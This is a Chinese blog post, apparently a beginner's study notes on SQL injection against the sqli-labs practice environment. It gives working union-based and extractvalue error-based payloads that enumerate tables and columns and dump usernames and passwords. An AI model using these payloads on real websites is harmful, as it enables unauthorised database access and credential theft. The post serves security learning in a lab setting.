sql注入学习(入门)

最新推荐文章于 2024-07-09 22:26:42 发布
最新推荐文章于 2024-07-09 22:26:42 发布
阅读量483 收藏 1
点赞数
分类专栏: sql注入 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Maxmalloc/article/details/102291846
版权

主要借助sqllibs 学习了一下sql注入的大致原理。
sql大致流程都是这样(没试过盲注)
爆库名(通常不需要知道,可以直接调用database()函数),爆表名,爆列名,最后爆数据
所以按照步骤来写sql语句:
爆表名
select group_concat(table_name)
from information_schema.tables
where table_schema=database()
爆列名
select group_concat(column_name)
from information_schema.columns
where table_name=‘你想要查询的表名’
爆数据
select group_concat(‘你爆出的列名’)
from ‘你要查询的表’

在知道了大致流程后,我们所需要做的,就是针对服务端的防护,运用不同的绕过方式。
在非盲注的情况下
less-1(存在回显)
源码分析
在这里插入图片描述
存在单引号字符注入
1)union
使用payload: -1’ and 1=1 --+判断出存在单引号字符型注入漏洞。
在这里插入图片描述
爆表名 -1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
在这里插入图片描述
爆列名 -1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+
在这里插入图片描述
爆数据 -1’ union select 1,2,group_concat(username,0x3a,password) from users --+
在这里插入图片描述
2)报错型
使用extractvalue模板
-1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))–+
在这里插入图片描述
-1’ and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns%20 where table_name=‘users’%20%20 limit 1,1)))–+
因为extractvalue限定了输出字符数量和不能超过一行,所以我们可以通过limit逐个将列名输出
在这里插入图片描述
-1’ and extractvalue(1,concat(0x7e,(select password from users where username=‘admin’ )))–+
在这里插入图片描述
盲注,主要基于bool和基于时间。
以后有时间再补充吧~~

Maxmalloc
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入学习入门
12-16
SQL注入学习入门SQL注入是一种常见的网络攻击手段,它能够让攻击者获取到网站的敏感信息,从而导致严重的安全隐患。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业...
Mysql中的table_schema
热门推荐
记录点滴
09-01 1万+
【INFORMATION_SCHEMA 数据库】是MySQL自带的,它提供了访问数据库元数据的方式。 元数据: 数据库名或表名,列的数据类型,或访问权限等。 在MySQL中,把【INFORMATION_SCHEMA】看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。 (1)查看Mysql所有数据库中数据表的名称、数据库注释、创建时间(mysql自带的和自定义的都会查询出来) informati...
MySQL中table_schema的基本操作
菜鸟要成长的博客
03-01 1万+
mysql数据库中有一些表(是view,只能做select操作)记录了现有表的meta data,比如某个column的名字,它的定义是什么等等。 列出test数据库中所有的表名,类型(普通表还是view)和使用的引擎 select table_name, table_type, engine FROM information_schema.tables WHERE table_schema = ‘test’ ORDER BY table_name DESC; 解释: 对表的meta data的查询
Sqli-lab教程-史上最全详解(1-22通关)
dzqxwzoe的博客
06-07 1116
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
dvwa靶场之sql注入
m0_63314341的博客
02-19 1371
sql注入是指通过分析代码,输入字符达到查找数据库中用户信息的一种行为,会导致用户账户的暴露 接下来我们先来分析一下源代码 SELECT first_name, last_name FROM users WHERE user_id = '$id' 其中重点则是上面的这段代码,这是对于数据库的一段查找代码 当我们为$id这个变量赋值时便会带入这段代码对数据库进行查询 ...
mysql查询库总记录数和库大小
qq_37372909的博客
05-19 476
下面是查询库数据条数 SELECT sum( TABLE_ROWS ) FROM `information_schema`.`tables` WHERE TABLE_SCHEMA='otms' 下面是查询库大小 select concat(round(sum(data_length/1024/1024),2),'MB') as data from `information_schema`.`tables` WHERE TABLE_SCHEMA='otms' ...
mysql手工注入技巧_MySQL数据库手工注入技巧
weixin_31303743的博客
01-19 340
MySQL数据库的注入很复杂、很精彩,完全是Access不能比的。因为MySQL的注入很灵活了,完全不像Access那样死板固定,我感觉Access的注入完全是靠人品,或者可以说,谁的表名、列名字典大,谁的成功率就大。根据我对MySQL的认识,注入时,基本可以通过爆、盲注、报错三种方式获得用户名和密码,在权限足够的情况下,还可以直接通过SQL语句插入并导出我们的一句话webshell。当拿到一个M...
渗透学习入门SQL注入
07-31
渗透学习入门SQL注入 SQL 注入是一种常见的Web 应用程序漏洞,攻击者通过构造恶意输入来访问或控制数据库中的数据。SQL 注入攻击通常发生在Web 应用程序使用用户输入来构建动态SQL 语句时,攻击者可以 inject ...
SQL注入攻防入门详解
11-12
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序未能正确过滤或验证用户输入的数据,从而能够执行恶意的SQL命令。在本文中,我们将深入探讨SQL注入的原理、危害、常见攻击方式,以及相应的防御策略。 一、...
sql注入之新手入门示例详解
09-10
SQL注入是一种常见的网络安全威胁,它发生在应用程序接收用户输入并直接构造SQL查询时,如果没有正确地过滤或转义这些输入,攻击者就能插入恶意的SQL语句,从而获取、修改、删除数据库中的敏感信息,甚至完全控制...
SQL注入实战
11-20
安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。
sql注入与盲注
Maqiuqiu520的博客
04-29 581
实验环境要求: 1、安装win7或win10的笔记本或PC电脑一台,硬盘100GB,内存8GB 2、安装VMware® Workstation 14以上 总体目标:基于centos7搭建dvwa web服务靶机,使用主机上的浏览器和kali虚拟机作为攻击机。使用kali中的burpsuite和主机上的浏览器攻击dvwa上的sql注入和sql盲注漏洞。 任务一、使用主机浏览器攻击dvwa中sql注入...
mysql 查看表空间大小 table_schema_详解MySQL查看数据库表容量大小的方法总结
weixin_29974217的博客
02-04 1504
概述今天主要介绍MySQL查看数据库表容量大小的几个方法,仅供参考。1、查看所有数据库容量大小SELECTtable_schema AS '数据库',sum( table_rows ) AS '记录数',sum( TRUNCATE ( data_length / 1024 / 1024, 2 ) ) AS '数据容量(MB)',sum( TRUNCATE ( index_length / 1024...
mysql 查询数据库、表相关信息
CSDN19970806的博客
03-23 426
/*查询所有的表的信息*/ select table_name 表明, engine, table_comment 描述, create_time 创建时间 from information_schema.tables where table_schema = (select database()) ; /*查询某个表的信息*/ select table_name ta...
使用SQL查询所有数据库名和表名及字段名(Mysql、SQLServer、Oracle)
码里行间
12-11 1751
MySQL中查询所有数据库名和表名 1.查询所有数据库 show databases; 2.查询指定数据库中所有表名 select table_name from information_schema.tables where table_schema='database_name' and table_type='base table'; 3.查询指定表中的所有字段名 se...
SQL获取table schema结构
weixin_30904593的博客
09-15 683
1. 获取检表语句 直接获取建表语句。 SHOW CREATE TABLE “table_name” 2. sql获取schema信息 select * from information_schema.columns where table_schema ='db_name' and table_name = 'table_name'; including:...
MySQL:TABLE_SCHEMA及其应用
最新发布
jclee95的个人博客
07-09 1064
在MySQL数据库管理系统中,TABLE_SCHEMA代表了数据库的逻辑结构和组织方式。TABLE_SCHEMA通常指的是数据库的名称,是MySQL中用于组织和管理表、视图、存储过程等数据库对象的顶层结构。本文介绍TABLE_SCHEMA,以及其应用。
十一、MySQL 系统表
骑士梦的博客
04-20 2593
一、INFORMATION_SCHEMA 表 二、MySQL 系统表
自定义MySQL实用的函数和存储过程(持续更新)
前者已逝,后者未至。
11-19 1295
通过MySQL函数,使日常开发变得更高效。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值